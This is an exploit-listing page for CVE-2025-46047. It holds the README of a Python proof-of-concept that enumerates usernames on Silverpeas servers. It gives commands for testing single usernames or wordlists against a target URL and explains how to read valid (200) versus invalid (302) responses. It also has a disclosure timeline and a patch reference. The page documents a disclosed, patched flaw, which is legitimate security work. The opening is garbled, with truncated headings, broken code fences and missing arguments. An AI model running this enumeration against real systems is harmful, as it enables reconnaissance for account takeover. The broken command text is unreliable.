Exploit for CVE-2025-46047

Name: Exploit for CVE-2025-46047
Rating: 5 (111 reviews)
2025-04-14 | CVSS 7.2
## https://sploitus.com/exploit?id=07484469-5FBF-54A5-97F1-4895E36435A1
# CVE-2025-46047
## Silverpeas  -u 
        ```
        *Example:* `python silverpeas_enum_poc.py http://vulnerable-silverpeas.local -u admin`

    * **Test usernames from a file:**
        ```bash
        python silverpeas_enum_poc.py  -w 
        ```
        *Example:* `python silverpeas_enum_poc.py https://vulnerable-silverpeas.com -w users.txt`

### Output

The script will output:
* `[+] Username '...' appears VALID (Status: 200)` for usernames likely corresponding to existing accounts.
* `[-] Username '...' appears INVALID (Status: 302)` for usernames likely not corresponding to existing accounts.

## Disclaimer

This script is provided for educational purposes and for demonstrating the vulnerability. Use this script responsibly and only against systems you have explicit, written authorization to test. Unauthorized scanning or testing is illegal and unethical. The author assumes no liability and is not responsible for any misuse or damage caused by this script.

## Author / Credit

* **Shantanu Saxena / j0ey17**

## Disclosure Timeline

* **Discovered:** 08/04/2025
* **Reported to Vendor (Silverpeas):** 08/04/2025
* **Vendor Acknowledged / Assigned ID (#14829):** 09/04/2025
* **Patch Released (Version 6.4.3):** 11/04/2025
* **PoC Published:** 14/04/2025
* **CVE ID: CVE-2025-46047**

## References
* **[(Vendor Fix PR)](https://github.com/Silverpeas/Silverpeas-Core/pull/1399)**